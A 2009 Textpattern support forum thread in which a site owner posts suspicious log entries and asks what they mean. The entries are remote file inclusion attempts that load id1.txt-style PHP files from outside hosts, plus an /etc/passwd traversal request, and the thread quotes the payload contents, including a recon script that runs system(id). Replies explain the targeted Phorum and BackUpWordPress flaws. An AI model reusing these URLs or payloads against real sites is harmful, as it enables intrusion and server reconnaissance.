Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2009-12-13 00:12:59

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,293
Website GitHub

Spurious URLs in visitor logs (id1.txt)

Over the past few days I’ve had some odd entries in the TXP logs on one of my sites. They look to me like a series of exploits from various IPs targeting different programs to, I assume, inject the name of somebody or some URL into the HTML page code. It doesn’t look any more sinister than that and, as far as I can tell, TXP is immune. They all seem to try to load some code in a file based on some permutation of id1.txt.

I can’t see anything changed on my server and the MySQL database seems ok so I don’t think these attempts amount to anything, but in case it’s anything more ominous and I’ve just not looked hard enough, here are the results of my sleuthing. Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me. Thanks!

Attempt 1

URL in TXP log: http://site.com/?PHORUM[settings_dir]=http://phoviet.vn.net//backend/id1.txt???
OR http://site.com/section/article//flash/initialise.php?foing_root_path=http://bobbydonut.com/stephanie/id11.txt??

IP: 91.121.181.60 ns1.​hardlogin.​com OR 74.86.17.106

Contents of id1.txt / id11.txt:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Attempt 2

URL in TXP log: http://site.com/index.php?pag=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt??

IP: 69.16.250.4 noc88.​noc88.​com

Contents of id1.txt:

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Attempt 3

URL in TXP log: http://site.com/section/article//plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??

IP: 91.192.110.155 155-​110.​furanet.​com OR 80.55.55.178 rd178.​internetdsl.​tpnet.​pl

The contents of id1.txt returns a 404, but it first does some URL rewriting to translate the address to: http://www.hyonsvc.co.kr//%E2%80%8Bbbs//%E2%80%8Bupload/%E2%80%8Bid1.%E2%80%8Btxt?%E2%80%8B?

Attempt 4

URL in TXP log: http:///?pag=http://basic-it.de/phpShop/soap/id.txt?

IP: 94.75.207.2

Contents of id.txt:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          

echo "xucx<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "xucx was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Attempt 5 (classic /etc/passwd access attempt)

URL in TXP log: index.​php?​pag=../../../../../../​../../../../../../../​etc/​passwd%00

IP: 69.162.109.186 illusion-​hosting.​net OR 216.​22.​48.​76


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

Offline

#2 2009-12-13 00:36:34

MattD
Plugin Author
From: Monterey, California
Registered: 2008-03-21
Posts: 1,254
Website

Re: Spurious URLs in visitor logs (id1.txt)

I see stuff like this pretty regularly.


My Plugins

Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker

Offline

#3 2009-12-13 00:44:34

Gocom
Developer Emeritus
From: Helsinki, Finland
Registered: 2006-07-14
Posts: 4,533
Website

Re: Spurious URLs in visitor logs (id1.txt)

Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me.

Nothing related to TXP. Just random script kids that are nothing to worry about.

  1. First one is for old Phorum. The URL itself says what it relies and tries: Global is set by the URL, server includes the settings file and the page dies. TXP doesn’t register variables from URLs (if plugins nor server isn’t set it to).
  2. URL’s acronym answers: Sad and famous BackUpWordPress.

Offline

#4 2009-12-13 08:07:25

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,032
Website GitHub Mastodon Twitter

Re: Spurious URLs in visitor logs (id1.txt)

I am getting it from http://www.zywesrebro.pl/fotki/fx29id1.txt
through

http://www.mysite.tld//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?

and

http://skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?

content:

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

Offline

#5 2009-12-13 09:35:13

the_ghost
Plugin Author
From: Minsk, The Republic of Belarus
Registered: 2007-07-26
Posts: 907
Website

Re: Spurious URLs in visitor logs (id1.txt)

May be some pattern you site was recognised to use Phorum scripts and got in hackers base as potentially buggie :) Nothing to worry, I think.


Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebok?

Offline

Board footer

Powered by FluxBB